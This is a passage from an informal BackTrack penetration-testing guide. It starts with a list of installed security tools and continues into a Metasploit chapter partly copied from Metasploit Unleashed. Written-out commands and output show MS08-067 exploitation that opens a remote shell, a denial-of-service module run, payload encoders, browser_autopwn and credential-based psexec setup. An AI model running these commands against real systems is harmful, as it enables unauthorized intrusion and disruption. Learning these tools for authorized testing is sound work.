ii vim-runtime
Vi IMproved - Runtime files
2:7.2.330-1ubuntu3
ii vim-tiny
2:7.2.330-1ubuntu3
Vi IMproved - enhanced vi editor - compact version
ii vinetto
0.7-bt2
Vinetto is a forensics tool to examine Thumbs.db files.
ii vlan
1.9-3ubuntu3
user mode programs to enable VLANs on your ethernet devices
ii voiper
0.07-bt3
VoIPER is a security toolkit that aims to allow developers and security
researchers to easily, extensively and automatically test VoIP devices for
securit
ii voiphopper
1.0-bt0
VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs
a VLAN Hop into the Voice VLAN on specific Ethernet switches. VoIP Hopper d
ii voipong
2.0-bt1
utility which detects all Voice Over IP calls on a pipeline
ii volatility
1.3-bt1
A completely open collection of tools, implemented in Python under the GNU
General Public License, for the extraction of digital artifacts from volatile
m
ii w3af
1.0-rc5-bt2
w3af is a Web Application Attack and Audit Framework. The project's goal is to
create a framework to find and exploit web application vulnerabilities that
ii w3m
0.5.2-2.1ubuntu1.2
WWW browsable pager with excellent tables/frames support
ii waffit
0.9.0-bt1
WAFW00F allows one to identify and fingerprint WAF products protecting a
website.
ii wapiti
2.2.1-bt2
Web application vulnerability scanner, & security auditor.
ii warvox
1.0.1-bt1
WarVOX is a suite of tools for exploring, classifying, and auditing telephone
systems.
ii wbar
light and fast launch bar
1.3.3+dfsg2-1
ii wbarconf
0.7.2-bt2
wbar configuration gui written with Python and GTK.
ii websecurify
0.8-bt0
Websecurify is a powerful web application security testing environment
designed from the ground up to provide the best combination of automatic and
manual
ii webshag
1.10-bt3
Webshag is a multi-threaded, multi-platform web server audit tool. Written in
Python, it gathers commonly useful functionalities for web server auditing l
ii webshells
collection of web shell
1.0-bt1
ii webslayer
rev5-bt0
A tool designed for bruteforcing Web Applications.
ii weevely
0.3-bt0
Weevely generate PHP code to trojanize a web server, and act like a client to
estabilish a telnet-like connection or inject addictional function on backdo
ii wepcrack
0.1-bt2
WEPCrack is an open source tool for breaking 802.11 WEP secret keys.
ii wfuzz
1.4c-bt1
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for
finding resources not linked (directories, servlets, scripts, etc), brutefo
ii wget
retrieves files from the web
1.12-1.1ubuntu2.1
ii whatweb
WhatWeb identifies websites.
0.4.7-bt3
ii whiptail
0.52.10-5ubuntu1
Displays user-friendly dialog boxes from shell scripts
ii wicd
1.7.0+ds1-2
wired and wireless network manager - metapackage
ii wicd-daemon
1.7.0+ds1-2
wired and wireless network manager - daemon
ii wicd-gtk
1.7.0+ds1-2
wired and wireless network manager - GTK+ client
ii wifitap
0.4.0-bt2
WiFi injection tool through tun/tap device
ii winbind
Samba nameservice integration server
ii windows-binaries
Various windows pentesting binaries.
1.0-bt0
ii wine
Microsoft Windows Compatibility Layer (dummy package)
ii wine1.2
Microsoft Windows Compatibility Layer (Binary Emulator and Library)
ii wine1.2-gecko
1.0.0-0ubuntu4
Microsoft Windows Compatibility Layer (Web Browser)
ii wireless-crda
1.12
Wireless Central Regulatory Domain Agent
ii wireless-tools
30~pre9-3ubuntu4
Tools for manipulating Linux Wireless Extensions
ii wireshark
1.4.7-bt0
A network "sniffer" - a tool that captures and analyzes packets off the wire.
ii wordlists
wordlists
1.0-bt0
ii wpasupplicant
0.6.9-3ubuntu3
client support for WPA and WPA2 (IEEE 802.11i)
ii wstool
0.14001-bt4
WSTOOL is OS-independence Web vulnerable scanner.
ii x-ttcidfont-conf
32
TrueType and CID fonts configuration for X
ii x11-apps
X applications
7.5+1ubuntu2
ii x11-common
X Window System (X.Org) infrastructure
1:7.5+5ubuntu1
ii x11-session-utils
X session utilities
7.5+1
ii x11-utils
X11 utilities
7.5+3
ii x11-xfs-utils
X font server utilities
7.4+1build2
ii x11-xkb-utils
X11 XKB utilities
7.5+1
ii x11-xserver-utils
X server utilities
7.5+1ubuntu2.1
ii x11proto-core-dev
7.0.16-1
X11 core wire protocol and auxiliary headers
ii x11proto-input-dev
X11 Input extension wire protocol
2.0-2
ii x11proto-kb-dev
X11 XKB extension wire protocol
1.0.4-1
ii xauth
X authentication utility
1:1.0.4-1
ii xbase-clients
miscellaneous X clients - metapackage
1:7.5+5ubuntu1
ii xbitmaps
Base X bitmaps
1.1.0-1
ii xdg-utils
1.0.2-6.1ubuntu3.1
desktop integration utilities from freedesktop.org
ii xfonts-base
standard fonts for X
1:1.0.1
ii xfonts-encodings
Encodings for X.Org fonts
1:1.0.3-1
ii xfonts-utils
X Window System font utility programs
1:7.5+2
ii xgps
1.1.5-bt0
xGPS is a free project aiming to bring powerful and easy to use navigation
software
ii xinit
X server initialisation tool
1.2.0-1
ii xkb-data
1.8-1ubuntu8.1~10.04.1
X Keyboard Extension (XKB) configuration data
ii xml-core
0.13
XML infrastructure and XML catalog file support
ii xplico
0.6.3-bt0
The goal of Xplico is extract from an internet traffic capture the
applications data contained.
ii xprobe2
Active OS fingerprinting tool.
2.1-bt2
ii xresprobe
X Resolution Probe
0.4.24ubuntu9
ii xserver-common
common files used by various X servers
2:1.7.6-2ubuntu7.6
ii xserver-xephyr
nested X server
2:1.7.6-2ubuntu7.6
ii xserver-xorg
the X.Org X server
1:7.5+5ubuntu1
ii xserver-xorg-core
Xorg X server - core server
2:1.7.6-2ubuntu7.6
ii xserver-xorg-input-all
1:7.5+5ubuntu1
the X.Org X server -- input driver metapackage
ii xserver-xorg-input-evdev
X.Org X server -- evdev input driver
1:2.3.2-5ubuntu1
ii xserver-xorg-input-mouse
X.Org X server -- mouse input driver
1:1.5.0-1
ii xserver-xorg-input-synaptics
1.2.2-1ubuntu4
Synaptics TouchPad driver for X.Org server
ii xserver-xorg-input-vmmouse
1:12.6.5-4ubuntu2
X.Org X server -- VMMouse input driver to use with VMWare
ii xserver-xorg-input-wacom
X.Org X server -- Wacom input driver
1:0.10.5-0ubuntu4.1
ii xserver-xorg-video-all
1:7.5+5ubuntu1
the X.Org X server -- output driver metapackage
ii xserver-xorg-video-apm
X.Org X server -- APM display driver
1:1.2.2-1
ii xserver-xorg-video-ark
X.Org X server -- ark display driver
1:0.7.2-1
ii xserver-xorg-video-ati
1:6.13.0-1ubuntu5
X.Org X server -- AMD/ATI display driver wrapper
ii xserver-xorg-video-chips
X.Org X server -- Chips display driver
1:1.2.2-1
ii xserver-xorg-video-cirrus
X.Org X server -- Cirrus display driver
1:1.3.2-1ubuntu1
ii xserver-xorg-video-fbdev
X.Org X server -- fbdev display driver
1:0.4.1-1ubuntu1
ii xserver-xorg-video-geode
2.11.11-1~lucid1
X.Org X server -- Geode GX2/LX display driver
ii xserver-xorg-video-i128
X.Org X server -- i128 display driver
1:1.3.3-1
ii xserver-xorg-video-i740
X.Org X server -- i740 display driver
1:1.3.2-1
ii xserver-xorg-video-intel
2:2.9.1-3ubuntu5
X.Org X server -- Intel i8xx, i9xx display driver
ii xserver-xorg-video-mach64
6.8.2-2
X.Org X server -- ATI Mach64 display driver
ii xserver-xorg-video-mga
X.Org X server -- MGA display driver
1:1.4.11.dfsg-2ubuntu1
ii xserver-xorg-video-neomagic
1:1.2.4-2
X.Org X server -- Neomagic display driver
ii xserver-xorg-video-nouveau
1:0.0.15+git20100219+9b4118d-0ubuntu5
X.Org X server -- Nouveau display driver (experimental)
ii xserver-xorg-video-nv
X.Org X server -- NV display driver
1:2.1.15-1ubuntu3
ii xserver-xorg-video-openchrome
X.Org X server -- VIA display driver
1:0.2.904+svn827-1
ii xserver-xorg-video-r128
6.8.1-2ubuntu1
X.Org X server -- ATI r128 display driver
ii xserver-xorg-video-radeon
1:6.13.0-1ubuntu5
X.Org X server -- AMD/ATI Radeon display driver
ii xserver-xorg-video-rendition
1:4.2.3-1
X.Org X server -- Rendition display driver
ii xserver-xorg-video-s3
1:0.6.3-1
X.Org X server -- legacy S3 display driver
ii xserver-xorg-video-s3virge
1:1.10.4-1
X.Org X server -- S3 ViRGE display driver
ii xserver-xorg-video-savage
X.Org X server -- Savage display driver
1:2.3.1-1ubuntu1
ii xserver-xorg-video-siliconmotion
1:1.7.3-1
X.Org X server -- SiliconMotion display driver
ii xserver-xorg-video-sis
X.Org X server -- SiS display driver
1:0.10.2-2
ii xserver-xorg-video-sisusb
1:0.9.3-1
X.Org X server -- SiS USB display driver
ii xserver-xorg-video-tdfx
X.Org X server -- tdfx display driver
1:1.4.3-1
ii xserver-xorg-video-trident
1:1.3.3-1
X.Org X server -- Trident display driver
ii xserver-xorg-video-tseng
X.Org X server -- Tseng display driver
1:1.2.3-1
ii xserver-xorg-video-v4l
1:0.2.0-4
X.Org X server -- Video 4 Linux display driver
ii xserver-xorg-video-vesa
X.Org X server -- VESA display driver
1:2.3.0-1ubuntu1
ii xserver-xorg-video-vmware
X.Org X server -- VMware display driver
1:10.16.9-1
ii xserver-xorg-video-voodoo
X.Org X server -- Voodoo display driver
1:1.2.3-1
ii xsltproc
XSLT command line processor
1.1.26-1ubuntu1
ii xssed
Firefox link to XSSED.com .
1.0-bt1
ii xsser
1.5-bt2
Cross Site "Scripter" is an automatic -framework- to detect, exploit and
report XSS vulnerabilities in web-based aplications.
ii xssfuzz
1.1-bt1
Its for finding new vectors and testing those within the context of
multiple encoding methods.
ii xterm
X terminal emulator
256-1ubuntu1
ii xtrans-dev
X transport library (development files)
1.2.5-1
ii xulrunner-1.9.2
0ubuntu0.10.04.1
1.9.2.17+build3+nobinonlyXUL + XPCOM application runner
ii xutils-dev
1:7.5+2
X Window System utility programs for development
ii xz-utils
XZ-format compression utilities
4.999.9beta+20091116-1
ii yelp
Help browser for GNOME
2.30.0-0ubuntu2
ii yersinia
0.7.1-bt0
A network tool designed to take advantage of some weakeness in different
network protocols.
ii zenity
2.30.0-0ubuntu1
Display graphical dialog boxes from shell scripts
ii zip
Archiver for .zip files
3.0-2
ii zlib1g
compression library - runtime
1:1.2.3.3.dfsg-15ubuntu1
ii zlib1g-dev
compression library - development
1:1.2.3.3.dfsg-15ubuntu1
End of the tools.
Chapter 2:The Metasploit Framework

This chapter introduces you to the most reputed framework. The
metasploit framework.
The Metasploit Project is a computer security project which
provides information about security vulnerabilities and aids in
penetration testing and IDS signature development.Its most wellknown sub-project is the open-source Metasploit Framework, a
tool for developing and executing exploit code against a remote
target machine. Other important sub-projects include the Opcode
Database, shellcode archive, and security research.The Metasploit
Project is also well known for anti-forensic and evasion tools,
some of which are built into the Metasploit Framework.
For those who dont like History , Let the game begin.
Terminology:
Exploit:
An exploit is the means by which an attacker, or pen tester for
that matter, takes
advantage of a flaw within a system, an application, or a service.
An attacker
uses an exploit to attack a system in a way that results in a
particular desired
outcome that the developer never intended. Common exploits
include buffer
overflows, web application vulnerabilities (such as SQL injection),
and configuration errors.
Payload
A payload is code that we want the system to execute and that is
to be selected
and delivered by the Framework. For example, a reverse shell is a
payload that
creates a connection from the target machine back to the
attacker as a Windows
command prompt (see Chapter 5), whereas a bind shell is a

payload that
binds a command prompt to a listening port on the target
machine, which
the attacker can then connect. A payload could also be something
as simple as
a few commands to be executed on the target operating system.
Shellcode
Shellcode is a set of instructions used as a payload when
exploitation occurs.
Shellcode is typically written in assembly language. In most
cases, a command
shell or a Meterpreter shell will be provided after the series of
instructions
have been performed by the target machine, hence the name.
Module
A module in the context of this book is a piece of software that
can be used by
the Metasploit Framework. At times, you may require the use of
an exploit
module, a software component that conducts the attack. Other
times, an
auxiliary module may be required to perform an action such as
scanning or
system enumeration. These interchangeable modules are the core

of what
makes the Framework so powerful.
Listener
A listener is a component within Metasploit that waits for an
incoming connection
of some sort. For example, after the target machine has been
exploited, it may
call the attacking machine over the Internet. The listener handles
that connection,
waiting on the attacking machine to be contacted by the
exploited system.
Metasploit Interfaces:
MSFconsole
Msfconsole is by far the most popular part of the Metasploit

Framework,
and for good reason. It is one of the most flexible, feature-rich,
and wellsupported
tools within the Framework. Msfconsole provides a handy all-inone
interface to almost every option and setting available in the

Framework; its
like a one-stop shop for all of your exploitation dreams. You can
use msfconsole
to do everything, including launching an exploit, loading auxiliary
modules,
performing enumeration, creating listeners, or running mass
exploitation
against an entire network.
Although the Metasploit Framework is constantly changing, a
subset of
commands remain relatively constant. By mastering the basics of
msfconsole,
you will be able to keep up with any changes. To illustrate the
importance of
learning msfconsole, it will be used in nearly every chapter of the
book.
To launch msfconsole, enter msfconsole at the command line:
To know the help do this, like to know about connect you can use:
And for those who are into more graphical oriented and want to
try different approach look for Armitage.
I would like to tell you guys that the msfconsole is what most of
the hackers use.
Msfcli
Msfcli provides a powerful command-line interface to the

framework.Note that when using msfcli, variables are assigned
using '=' and that all options are case-sensitive.
_______________________________________________________________________
root@bt4:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.201
PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 676 exploits - 328 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11084 updated today (2010.11.21)
RHOST => 192.168.1.201
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.201
[*] Command shell session 1 opened (192.168.1.101:35009 -> 192.168.1.201:4444) at 201011-21 14:44:42 -0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
If you aren't entirely sure about what options belong to a

particular module, you can append the letter 'O' to the end of the
string at whichever point you are stuck.Thats why they say

backtrack is like giving gun to monkeys.
root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi O

Name Current Setting Required Description
---- --------------- -------- ----------RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
To display the payloads that are available for the current module, append the letter
'P' to the command-line string.
root@bt4:/pentest/exploits/framework3# ./msfcli windows/smb/ms08_067_netapi
RHOST=192.168.1.115 P
Compatible payloads
===================
Name Description
---- ----------generic/debug_trap Generate a debug trap in the target process
...snip...
The other options available to msfcli are available by issuing 'msfcli -h'.
Benefits of mscli
Supports the launching of exploits and auxiliary modules
Useful for specific tasks
Good for learning
Convenient to use when testing or developing a new exploit
Good tool for one-off exploitation
Excellent if you know exactly which exploit and options you need
Wonderful for use in scripts and basic automation
The only real drawback of msfcli is that it is not supported quite as well as
msfconsole and it can only handle one shell at a time, making it rather impractical for
client-side attacks. It also doesn't support any of the advanced automation features
of msfconsole.
The next section have been copy pasted from metasploit unleased so formatting is bad
hope that you look for knowledge not the format.The best way to learn the framework is to
type the commands in console while you go through the section.
Tab Completion
The msfconsole is designed to be fast to use and one of the features that helps this
goal is tab completion. With the wide array of modules available, it can be difficult to
remember the exact name and path of the particular module you wish to make use
of. As with most other shells, entering what you know and pressing 'Tab' will present
you with a list of options available to you or auto-complete the string if there is only
one option. Tab completion depends on the ruby readline extension and nearly every
command in the console supports tab completion.
use exploit/windows/dce
use .*netapi.*
set LHOST
show
set TARGET
set PAYLOAD windows/shell/
exp
msf > use exploit/windows/smb/ms
use exploit/windows/smb/ms03_049_netapi
use exploit/windows/smb/ms04_007_killbill
use exploit/windows/smb/ms04_011_lsass
use exploit/windows/smb/ms04_031_netdde
use exploit/windows/smb/ms05_039_pnp
use exploit/windows/smb/ms06_025_rasmans_reg
use exploit/windows/smb/ms06_025_rras
use exploit/windows/smb/ms06_066_nwapi
use exploit/windows/smb/ms06_066_nwwks
use exploit/windows/smb/msdns_zonename
msf > use exploit/windows/smb/ms08_067_netapi
The back Command

Once you have finished working with a particular module, or if you inadvertently
select the wrong module, you can issue the 'back' command to move out of the
current context. This, however is not required. Just as you can in commercial
routers, you can switch modules from within other modules. As a reminder, variables
will only carry over if they are set globally.

msf auxiliary(ms09_001_write) > back
msf >
The check Command

There aren't many exploits that support it, but there is also a 'check' option that will
check to see if a target is vulnerable to a particular exploit instead of actually
exploiting it.
msf exploit(ms04_045_wins) > show options

Module options:

---- --------------- -------- ----------RHOST 192.168.1.114 yes The target address
RPORT 42 yes The target port
Exploit target:
Id Name
-- ---0 Windows 2000 English
msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)
The connect Command

There is a miniature netcat clone built into the msfconsole that supports SSL,
proxies, pivoting, and file sends. By issuing the 'connect' command with an ip
address and port number, you can connect to a remote host from within msfconsole
the same as you would with netcat or telnet.
msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
!
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
DD-WRT login:
By passing the '-s' argument to connect, it will connect via SSL:

msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0
HTTP/1.1 302 Found
Date: Sat, 25 Jul 2009 05:03:42 GMT
Server: Apache/2.2.11
Location: http://www.metasploit.org/
exploit vs. run

When launching an exploit, you issue the 'exploit' command whereas if you are using
an auxiliary module, the proper usage is 'run' although 'exploit' will work as well.
msf auxiliary(ms09_001_write) > run
Attempting to crash the remote host...

datalenlow=65535 dataoffset=65535 fillersize=72
rescue
rescue
rescue
rescue
rescue
...snip..
.
The irb Command

Running the 'irb' command will drop you into a live Ruby interpreter shell where you
can issue commands and create Metasploit scripts on the fly. This feature is also
very useful for understanding the internals of the Framework.
msf > irb
[*] Starting IRB shell...
>> puts "Hello, metasploit!"
Hello, metasploit!
>> Framework::Version
=> "3.3-dev"
>> framework.modules.keys.length
=>744
The jobs Command

Jobs are modules that are running in the background. The 'jobs' command provides
the ability to list and terminate these jobs.
msf exploit(ms08_067_netapi) > jobs -h
Usage: jobs [options]
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs.
-h Help banner.
-k Terminate the specified job name.

-l list all running jobs.
The load Command

The 'load' command loads a plugin from Metasploit's 'plugin' directory. Arguments
are passed as 'key=val' on the shell.
msf > load
Usage: load [var=val var=val ...]
Load a plugin from the supplied path. The optional
var=val options are custom parameters that can be
passed to plugins.
msf > load pcap_log
[*] Successfully loaded plugin: pcap_log
"unload" Command
Conversely, the 'unload' command unloads a previously loaded plugin and removes
any extended commands.
msf > load pcap_log
[*] Successfully loaded plugin: pcap_log
msf > unload pcap_log
Unloading plugin pcap_log...unloaded.
"loadpath" Command
The 'loadpath' command will load a third-part module tree for the path so you can
point Metasploit at your 0-day exploits, encoders, payloads, etc.
msf > loadpath /home/secret/modules
Loaded 0 modules.
The resource Command

Some attacks such as Karmetasploit use a resource (batch) file that you can load
through the msfconsole using the 'resource' command. These files are a basic
scripting for msfconsole. It runs the commands in the file in sequence. Later on we
will discuss how, outside of Karmetasploit, that can be very useful.
msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated
plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
...snip...
Batch files can greatly speed up testing and development times as well as allow the
user to automate many tasks. Besides loading a batch file from within msfconsole,
they can also be passed at startup using the '-r' flag. The simple example below
creates a batch file to display the Metasploit version number at startup.
root@bt4-pre:/pentest/exploits/framework3# echo version > version.rc
root@bt4-pre:/pentest/exploits/framework3# ./msfconsole -r version.rc
=[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 155 aux
resource> version
Framework: 3.3-dev.6055
Console : 3.3-dev.6476
msf >
The route Command

The "route" command in Metasploit allows you to route sockets through a session
or 'comm', providing basic pivoting capabilities. To add a route, you pass the target
subnet and network mask followed by the session (comm) number.
msf exploit(ms08_067_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]
Route traffic destined to a given subnet through a supplied session.
The default comm is Local.
msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- ------192.168.1.0 255.255.255.0 Session 2
The info Command

The 'info' command will provide detailed information about a particular module
including all options, targets, and other information. Be sure to always read the
module description prior to using it as some may have un-desired effects.
The info command also provides the following information:
The author and licensing information
Vulnerability references (ie: CVE, BID, etc)
Any payload restrictions the module may have
msf > info dos/windows/smb/ms09_001_write
Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
Version: 6890
License: Metasploit Framework License (BSD)
Provided by:
j.v.vallejo
The set/unset Commands

The 'set' command allows you to configure Framework options and parameters for
the current module you are working with.
msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options
Module options:
A recently added feature in Metasploit is the ability to set an encoder to use at runtime.
This is particularly useful in exploit development when you aren't quite certain
as to which payload encoding methods will work with an exploit.
msf exploit(ms08_067_netapi) > show encoders
Compatible encoders
===================
Name Description
---- ----------cmd/generic_sh Generic Shell Variable Substitution Command Encoder
generic/none The "none" Encoder
mipsbe/longxor XOR Encoder
mipsle/longxor XOR Encoder
php/base64 PHP Base64 encoder
ppc/longxor PPC LongXOR Encoder
ppc/longxor_tag PPC LongXOR Encoder
sparc/longxor_tag SPARC DWORD XOR Encoder
x64/xor XOR Encoder
x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower Avoid UTF8/tolower
x86/call4_dword_xor Call+4 Dword XOR Encoder
x86/countdown Single-byte XOR Countdown Encoder
x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha Non-Alpha Encoder
x86/nonupper Non-Upper Encoder
x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
"unset" Command
The opposite of the 'set' command, of course, is 'unset'. 'Unset' removes a parameter
previously configured with 'set'. You can remove all assigned variables with 'unset
all'.
msf > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > set THREADS 50
THREADS => 50
msf > set
Global
======
Name Value
---- ----RHOSTS 192.168.1.0/24
THREADS 50
msf > unset THREADS
Unsetting THREADS...
msf > unset all
Flushing datastore...
msf > set
Global
======
No entries in data store.
The sessions Command

The 'sessions' command allows you to list, interact with, and kill spawned sessions.
The sessions can be shells, Meterpreter sessions, VNC, etc.
msf > sessions
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-d Detach an interactive session
-h Help banner.
-i Interact with the supplied session identifier.
-k Terminate session.
-l List all active sessions.
-q Quiet mode.
-v List verbose fields.
To list any active sessions, pass the '-l' options to 'sessions'.
msf exploit(3proxy) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- -----1 Command shell 192.168.1.101:33191 -> 192.168.1.104:4444
To interact with a given session, you just need to use the '-i' switch followed by the Id
number of the session.
msf exploit(3proxy) > sessions -i 1
[*] Starting interaction with 1...
The search Command

The msfconsole includes an extensive regular-expression based search functionality.
If you have a general idea of what you are looking for you can search for it via
'search '. In the output below, a search is being made for MS Bulletin MS09-011. The
search function will locate this string within the module names, descriptions,
references, etc.
Note the naming convention for Metasploit modules uses underscores versus
hyphens.
msf > search ms09-001
[*] Searching loaded modules for pattern 'ms09-001'...
Auxiliary
=========
Name Description
---- ----------dos/windows/smb/ms09_001_write Microsoft SRV.SYS WriteAndX Invalid DataOffset
The show Command

Entering 'show' at the msfconsole prompt will display every module within Metasploit.
msf > show
Encoders
========
Name Description
...snip...
There are a number of 'show' commands you can use but the ones you will use most
frequently are 'show auxiliary', 'show exploits', 'show payloads', 'show encoders', and
'show nops'.
Executing 'show auxiliary' will display a listing of all of the available auxiliary modules
within Metasploit. As mentioned earlier, auxiliary modules include scanners, denial of
service modules, fuzzers, and more.
msf > show auxiliary
Auxiliary
=========
Name Description
---- ----------admin/backupexec/dump Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry Veritas Backup Exec Server Registry Access
admin/cisco/ios_http_auth_bypass Cisco IOS HTTP Unauthorized Administrative
Access
...snip...
Naturally, 'show exploits' will be the command you are most interested in running
since at its core, Metasploit is all about exploitation. Run 'show exploits' to get a
listing of all exploits contained in the framework.
msf > show exploits
Exploits
========
Name Description
---- ----------aix/rpc_ttdbserverd_realpath ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer
Overflow
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow
...snip...
Running 'show payloads' will display all of the different payloads for all platforms
available within Metasploit.
msf > show payloads
Payloads
========
Name Description
---- -----------
aix/ppc/shell_bind_tcp AIX Command Shell, Bind TCP Inline

aix/ppc/shell_find_port AIX Command Shell, Find Port Inline
aix/ppc/shell_reverse_tcp AIX Command Shell, Reverse TCP Inline
...snip...
As you can see, there are a lot of payloads available. Fortunately, when you are in
the context of a particular exploit, running 'show payloads' will only display the
payloads that are compatible with that particular exploit. For instance, if it is a
Windows exploit, you will not be shown the Linux payloads.
msf exploit(ms08_067_netapi) > show payloads
Compatible payloads
===================
Name Description
---- ----------generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX
or Win7)
...snip...
If you have selected a specific module, you can issue the 'show options' command to
display which settings are available and/or required for that specific module.
msf exploit(ms08_067_netapi) > show options
Module options:
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ---0 Automatic Targeting
If you aren't certain whether an operating system is vulnerable to a particular exploit,

run the 'show targets' command from within the context of an exploit module to see
which targets are supported.
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ---0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
...snip...
If you wish the further fine-tune an exploit, you can see more advanced options by
running 'show advanced'.
msf exploit(ms08_067_netapi) > show advanced
Module advanced options:
Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port
...snip...
Running 'show encoders' will display a listing of the encoders that are available
within MSF.
msf > show encoders
Encoders
========
Name Description
mipsle/longxor XOR Encoder
php/base64 PHP Base64 encoder
ppc/longxor PPC LongXOR Encoder
ppc/longxor_tag PPC LongXOR Encoder
sparc/longxor_tag SPARC DWORD XOR Encoder
x64/xor XOR Encoder
x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower Avoid UTF8/tolower
x86/call4_dword_xor Call+4 Dword XOR Encoder
x86/countdown Single-byte XOR Countdown Encoder
x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive Jump/Call XOR Additive Feedback Encoder
x86/nonalpha Non-Alpha Encoder
x86/nonupper Non-Upper Encoder
x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder
Lastly, issuing the 'show nops' command will display the NOP Generators that
Metasploit has to offer.
msf > show nops
NOP Generators
==============
Name Description
---- ----------armle/simple Simple
php/generic PHP Nop Generator
ppc/simple Simple
sparc/random SPARC NOP generator
tty/generic TTY Nop Generator
x64/simple Simple
x86/opty2 Opty2
x86/single_byte Single Byte
The setg Command

In order to save a lot of typing during a pentest, you can set global variables within
msfconsole. You can do this with the 'setg' command. Once these have been set,
you can use them in as many exploits and auxiliary modules as you like. You can
also save them for use the next time your start msfconsole. However, the pitfall is
forgetting you have saved globals, so always check your options before you "run" or
"exploit". Conversely, you can use the "unsetg" command to unset a global
variable. In the examples that follow, variables are entered in all-caps (ie: LHOST),
but Metasploit is case-insensitive so it is not necessary to do so.
msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136
After setting your different variables, you can run the 'save' command to save your
current environment and settings. With your settings saved, they will be
automatically loaded on startup which saves you from having to set everything again.
msf > save
Saved configuration to: /root/.msf3/config
msf >
The use Command

When you have decided on a particular module to make use of, issue the 'use'
command to select it. The 'use' command changes your context to a specific module,
exposing type-specific commands. Notice in the output below that any global
variables that were previously set are already configured.
msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options
Module options:
msf auxiliary(ms09_001_write) >
Metasploit Exploits
All exploits in the Metasploit Framework will fall into two categories: active and
passive.
Active Exploits
Active exploits will exploit a specific host, run until completion, and then exit.
Brute-force modules will exit when a shell opens from the victim.
Module execution stops if an error is encountered.
You can force an active module to the background by passing '-j' to the exploit
command:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
Active Exploit Example

The following example makes use of a previously acquired set of credentials to
exploit and gain a reverse shell on the target system.
msf > use exploit/windows/smb/psexec
